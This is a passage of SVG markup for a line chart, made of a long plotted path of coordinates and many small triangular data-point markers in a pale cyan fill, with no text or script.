236.62267626666662 L 159.77113970588235 236.53867146666664 L 161.29917279411765 236.501202208 L 162.82720588235296 236.47307036799998 L 164.35523897058823 236.47307036799998 L 165.88327205882354 236.296322848 L 167.41130514705884 235.330569568 L 168.93933823529412 234.542878048 L 170.46737132352942 232.607322208 L 171.99540441176472 223.29735260799998 L 173.5234375 214.328197408 L 175.0514705882353 207.661803808 L 176.5795036764706 201.162709408 L 178.10753676470588 196.42505180799998 L 179.6355698529412 190.607763808 L 181.1636029411765 183.028861408 L 182.69163602941177 178.910672608 L 184.21966911764707 177.936799456 L 185.74770220588235 177.936799456 L 187.27573529411765 177.89718834133325 L 188.80376838235296 177.23994994133324 L 190.33180147058823 177.23994994133324 L 191.85983455882354 176.7622087040001 L 193.38786764705884 176.659486048 L 194.91590073529412 175.380659488 L 196.44393382352942 175.05897852799976 L 197.97196691176472 175.05897852799976 L 199.5 175.05897852799976 L 201.0280330882353 175.05897852799976 L 202.5560661764706 174.9770986133331 L 204.08409926470588 174.32841106133316 L 205.6121323529412 173.80979774933314 L 207.1401654411765 173.67152075733324 L 208.66819852941177 173.67152075733324 L 210.19623161764707 173.67152075733324 L 211.72426470588235 173.67152075733324 L 213.25229779411765 173.67152075733324 L 214.78033088235296 173.67152075733324 L 216.30836397058823 173.67152075733324 L 217.83639705882354 173.67152075733324 L 219.36443014705884 173.67152075733324 L 220.89246323529412 173.67152075733324 L 222.42049632352942 173.67152075733324 L 223.94852941176472 173.67152075733324 L 225.4765625 173.67152075733324 L 227.0045955882353 173.65162955733325 L 228.5326286764706 172.40985035733326 L 230.06066176470588 172.00701803733327 L 231.5886948529412 170.01679691733327 L 233.1167279411765 168.07651691733327 L 234.64476102941177 165.57883931733326 L 236.17279411764707 164.35862628266688 L 237.70082720588238 163.47452953599964 L 239.22886029411765 161.62198393599965 L 240.75689338235296 159.92814169599964 L 242.28492647058823 158.88675567999965 L 243.81295955882354 157.720821941333 L 245.34099264705884 157.720821941333 L 246.86902573529412 157.720821941333 L 248.39705882352942 157.720821941333 L 249.92509191176472 157.720821941333 L 251.453125 157.720821941333 L 252.9811580882353 157.720821941333 L 254.5091911764706 156.32247058133302 L 256.0372242647059 154.99228210133302 L 257.56525735294116 153.73583314133302 L 259.09329044117646 153.09221074133302 L 260.62132352941177 152.45501035733304 L 262.1493566176471 151.87572414933265 L 263.6773897058824 151.4342807999993 L 265.2054227941177 150.8807781653328 L 266.7334558823529 150.18465128533276 L 268.26148897058823 149.84793194666614 L 269.78952205882354 149.03587370666614 L 271.31755514705884 148.31781322666652 L 272.84558823529414 148.00865385599982 L 274.37362132352945 147.8584705599998 L 275.9016544117647 147.56978925866633 L 277.4296875 147.35941140266632 L 278.9577205882353 147.0931298026663 L 280.4857536764706 146.81150750933327 L 282.0137867647059 146.62345831466655 L 283.54181985294116 146.45029831466655 L 285.06985294117646 146.42543431466655 L 286.59788602941177 146.42543431466655 L 288.1259191176471 146.42543431466655 L 289.6539522058824 146.42543431466655 L 291.1819852941177 146.42543431466655 L 292.7100183823529 146.42543431466655 L 294.23805147058823 146.42543431466655 L 295.76608455882354 146.42543431466655 L 297.29411764705884 146.42543431466655 L 298.82215073529414 146.42543431466655 L 300.35018382352945 146.42543431466655 L 301.8782169117647 146.42543431466655 L 303.40625 146.42543431466655 L 304.9342830882353 146.3963473813333 L 306.4623161764706 146.3963473813333 L 307.9903492647059 146.3963473813333 L 309.51838235294116 146.3963473813333 L 311.04641544117646 146.3963473813333 L 312.57444852941177 146.3963473813333 L 314.1024816176471 146.3963473813333 L 315.6305147058824 146.3963473813333 L 317.1585477941177 146.3963473813333 L 318.6865808823529 146.3905292053333 L 320.21461397058823 146.3905292053333 L 321.74264705882354 146.3905292053333 L 323.27068014705884 146.3905292053333 L 324.79871323529414 146.3905292053333 L 326.32674632352945 146.3905292053333 L 327.8547794117647 146.3905292053333 L 329.3828125 146.3905292053333 L 330.9108455882353 146.3905292053333 L 332.4388786764706 146.3905292053333 L 333.9669117647059 146.3905292053333 L 335.4949448529412 146.3905292053333 L 337.02297794117646 146.3905292053333 L 338.55101102941177 146.3905292053333 L 340.0790441176471 146.3905292053333 L 341.6070772058824 146.3905292053333 L 343.1351102941177 146.3905292053333 L 344.6631433823529 146.3905292053333 L 346.19117647058823 146.3905292053333 L 347.71920955882354 146.3905292053333 L 349.24724264705884 146.34364280533327 L 350.77527573529414 145.8179112853333 L 352.30330882352945 145.2620943253333 L 353.8313419117647 144.8875892053333 L 355.359375 144.3563149866667 L 356.8874080882353 144.1452760639999 L 358.4154411764706 143.66090166399988 L 359.9434742647059 143.5343794239999 L 361.4715073529412 143.32381686399987 L 362.99954044117646 142.67912886399986 L 364.52757352941177 142.22990387199988 L 366.0556066176471 141.66738705066638 L 367.5836397058824 140.2285630186664 L 369.1116727941177 138.73015181866637 L 370.6397058823529 137.82415501866637 L 372.16773897058823 136.16395021866634 L 373.69577205882354 133.70063821866637 L 375.22380514705884 131.54912077866635 L 376.75183823529414 130.62727021866638 L 378.27987132352945 129.24230989866638 L 379.8079044117647 128.87701156266638 L 381.3359375 128.87701156266638 L 382.8639705882353 128.87701156266638 L 384.3920036764706 128.87701156266638 L 385.9200367647059 128.63470596266635 L 387.4480698529412 128.24192580266637 L 388.97610294117646 127.82218596266637 L 390.50413602941177 127.66921908266636 L 392.0321691176471 127.53481613866634 L 393.5602022058824 127.16046730666633 L 395.0882352941177 127.08597002666636" fill="none" stroke="#aaeeee" stroke-width="2"></path><path d="M 395 132.32 L 391 124.32 399 124.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 393.5 132.32 L 389.5 124.32 397.5 124.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 392 132.82 L 388 124.82 396 124.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 390.5 132.82 L 386.5 124.82 394.5 124.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 389 133.32 L 385 125.32 393 125.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 387.5 133.32 L 383.5 125.32 391.5 125.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 386 133.82 L 382 125.82 390 125.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 384.5 134.32 L 380.5 126.32 388.5 126.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 383 134.32 L 379 126.32 387 126.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 134.32 L 377.5 126.32 385.5 126.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 380 134.32 L 376 126.32 384 126.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 378.5 134.32 L 374.5 126.32 382.5 126.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 377 135.82 L 373 127.82 381 127.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 375 136.82 L 371 128.82 379 128.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 138.82 L 369.5 130.82 377.5 130.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 372 141.32 L 368 133.32 376 133.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 370.5 143.32 L 366.5 135.32 374.5 135.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 369 143.82 L 365 135.82 373 135.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 145.32 L 363.5 137.32 371.5 137.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 366 146.82 L 362 138.82 370 138.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 364.5 147.32 L 360.5 139.32 368.5 139.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 363 147.82 L 359 139.82 367 139.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 148.82 L 357.5 140.82 365.5 140.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 360 148.82 L 356 140.82 364 140.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 358.5 148.82 L 354.5 140.82 362.5 140.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 357 149.32 L 353 141.32 361 141.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 149.82 L 351.5 141.82 359.5 141.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 354 150.32 L 350 142.32 358 142.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 352.5 150.82 L 348.5 142.82 356.5 142.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 351 151.32 L 347 143.32 355 143.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 349 151.82 L 345 143.82 353 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 151.82 L 343.5 143.82 351.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 346 151.82 L 342 143.82 350 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 344.5 151.82 L 340.5 143.82 348.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 343 151.82 L 339 143.82 347 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 151.82 L 337.5 143.82 345.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 340 151.82 L 336 143.82 344 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 338.5 151.82 L 334.5 143.82 342.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 337 151.82 L 333 143.82 341 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 335.5 151.82 L 331.5 143.82 339.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 334 151.82 L 330 143.82 338 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 332.5 151.82 L 328.5 143.82 336.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 331 151.82 L 327 143.82 335 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 329.5 151.82 L 325.5 143.82 333.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 328 151.82 L 324 143.82 332 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 326.5 151.82 L 322.5 143.82 330.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 325 151.82 L 321 143.82 329 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 323.5 151.82 L 319.5 143.82 327.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 321.5 151.82 L 317.5 143.82 325.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 320 151.82 L 316 143.82 324 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 318.5 151.82 L 314.5 143.82 322.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 317 151.82 L 313 143.82 321 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 315.5 151.82 L 311.5 143.82 319.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 314 151.82 L 310 143.82 318 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 312.5 151.82 L 308.5 143.82 316.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 311 151.82 L 307 143.82 315 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 309.5 151.82 L 305.5 143.82 313.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 308 151.82 L 304 143.82 312 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 306.5 151.82 L 302.5 143.82 310.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 305 151.82 L 301 143.82 309 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 303.5 151.82 L 299.5 143.82 307.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 302 151.82 L 298 143.82 306 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 151.82 L 296.5 143.82 304.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 299 151.82 L 295 143.82 303 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 297.5 151.82 L 293.5 143.82 301.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 296 151.82 L 292 143.82 300 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 294 151.82 L 290 143.82 298 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 151.82 L 288.5 143.82 296.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 291 151.82 L 287 143.82 295 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 289.5 151.82 L 285.5 143.82 293.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 288 151.82 L 284 143.82 292 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 151.82 L 282.5 143.82 290.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 285 151.82 L 281 143.82 289 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 283.5 151.82 L 279.5 143.82 287.5 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 282 151.82 L 278 143.82 286 143.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 152.32 L 276.5 144.32 284.5 144.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 279 152.32 L 275 144.32 283 144.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 277.5 152.82 L 273.5 144.82 281.5 144.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 276 152.82 L 272 144.82 280 144.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 153.32 L 270.5 145.32 278.5 145.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 273 153.32 L 269 145.32 277 145.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 271.5 153.82 L 267.5 145.82 275.5 145.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 270 154.32 L 266 146.32 274 146.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 155.32 L 264.5 147.32 272.5 147.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 155.32 L 262.5 147.32 270.5 147.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 265 156.32 L 261 148.32 269 148.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 263.5 156.82 L 259.5 148.82 267.5 148.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 262 157.32 L 258 149.32 266 149.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 157.82 L 256.5 149.82 264.5 149.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 259 158.32 L 255 150.32 263 150.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 257.5 158.82 L 253.5 150.82 261.5 150.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 256 160.32 L 252 152.32 260 152.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 254.5 161.82 L 250.5 153.82 258.5 153.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 253 162.82 L 249 154.82 257 154.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 251.5 162.82 L 247.5 154.82 255.5 154.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 250 162.82 L 246 154.82 254 154.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 248.5 162.82 L 244.5 154.82 252.5 154.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 247 162.82 L 243 154.82 251 154.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 245.5 162.82 L 241.5 154.82 249.5 154.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 244 162.82 L 240 154.82 248 154.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 242.5 164.32 L 238.5 156.32 246.5 156.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 241 165.32 L 237 157.32 245 157.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 239 166.82 L 235 158.82 243 158.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 237.5 168.82 L 233.5 160.82 241.5 160.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 236 169.82 L 232 161.82 240 161.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 234.5 170.82 L 230.5 162.82 238.5 162.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 233 173.32 L 229 165.32 237 165.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 231.5 175.32 L 227.5 167.32 235.5 167.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 230 177.32 L 226 169.32 234 169.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 228.5 177.82 L 224.5 169.82 232.5 169.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 227 178.82 L 223 170.82 231 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 225.5 178.82 L 221.5 170.82 229.5 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 224 178.82 L 220 170.82 228 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 222.5 178.82 L 218.5 170.82 226.5 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 221 178.82 L 217 170.82 225 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 178.82 L 215.5 170.82 223.5 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 218 178.82 L 214 170.82 222 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 216.5 178.82 L 212.5 170.82 220.5 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 215 178.82 L 211 170.82 219 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 178.82 L 209.5 170.82 217.5 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 178.82 L 207.5 170.82 215.5 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 210 178.82 L 206 170.82 214 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 208.5 178.82 L 204.5 170.82 212.5 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 207 178.82 L 203 170.82 211 170.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 179.32 L 201.5 171.32 209.5 171.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 204 179.82 L 200 171.82 208 171.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 202.5 180.32 L 198.5 172.32 206.5 172.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 201 180.32 L 197 172.32 205 172.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 180.32 L 195.5 172.32 203.5 172.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 198 180.32 L 194 172.32 202 172.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 196.5 180.32 L 192.5 172.32 200.5 172.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 195 180.82 L 191 172.82 199 172.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 181.82 L 189.5 173.82 197.5 173.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 192 182.32 L 188 174.32 196 174.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 190.5 182.32 L 186.5 174.32 194.5 174.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 189 182.32 L 185 174.32 193 174.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 183.32 L 183.5 175.32 191.5 175.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 183.32 L 181.5 175.32 189.5 175.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 184 183.32 L 180 175.32 188 175.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 182.5 184.32 L 178.5 176.32 186.5 176.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 181 188.32 L 177 180.32 185 180.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 195.82 L 175.5 187.82 183.5 187.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 178 201.82 L 174 193.82 182 193.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 176.5 206.32 L 172.5 198.32 180.5 198.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 175 212.82 L 171 204.82 179 204.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 173.5 219.82 L 169.5 211.82 177.5 211.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 172 228.82 L 168 220.82 176 220.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 170.5 237.82 L 166.5 229.82 174.5 229.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 169 239.82 L 165 231.82 173 231.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 167.5 240.82 L 163.5 232.82 171.5 232.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 166 241.82 L 162 233.82 170 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 164.5 241.82 L 160.5 233.82 168.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 163 241.82 L 159 233.82 167 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 161.5 241.82 L 157.5 233.82 165.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 160 241.82 L 156 233.82 164 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 158 241.82 L 154 233.82 162 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 156.5 241.82 L 152.5 233.82 160.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 155 241.82 L 151 233.82 159 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 153.5 241.82 L 149.5 233.82 157.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 152 241.82 L 148 233.82 156 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 150.5 241.82 L 146.5 233.82 154.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 149 241.82 L 145 233.82 153 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 147.5 241.82 L 143.5 233.82 151.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 146 241.82 L 142 233.82 150 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 144.5 241.82 L 140.5 233.82 148.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 143 241.82 L 139 233.82 147 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 141.5 241.82 L 137.5 233.82 145.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 140 241.82 L 136 233.82 144 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 241.82 L 134.5 233.82 142.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 137 241.82 L 133 233.82 141 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 135.5 241.82 L 131.5 233.82 139.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 134 241.82 L 130 233.82 138 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 241.82 L 128.5 233.82 136.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 241.82 L 126.5 233.82 134.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 129 241.82 L 125 233.82 133 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 127.5 241.82 L 123.5 233.82 131.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 126 241.82 L 122 233.82 130 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 241.82 L 120.5 233.82 128.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 123 241.82 L 119 233.82 127 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 121.5 241.82 L 117.5 233.82 125.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 120 241.82 L 116 233.82 124 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 241.82 L 114.5 233.82 122.5 233.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 117 242.32 L 113 234.32 121 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 115.5 242.32 L 111.5 234.32 119.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 114 242.32 L 110 234.32 118 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 242.32 L 108.5 234.32 116.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 111 242.32 L 107 234.32 115 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 109.5 242.32 L 105.5 234.32 113.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 108 242.32 L 104 234.32 112 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 242.32 L 102.5 234.32 110.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 105 242.32 L 101 234.32 109 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 103 242.32 L 99 234.32 107 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 101.5 242.32 L 97.5 234.32 105.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 100 242.32 L 96 234.32 104 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 242.32 L 94.5 234.32 102.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 97 242.32 L 93 234.32 101 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 95.5 242.32 L 91.5 234.32 99.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 94 242.32 L 90 234.32 98 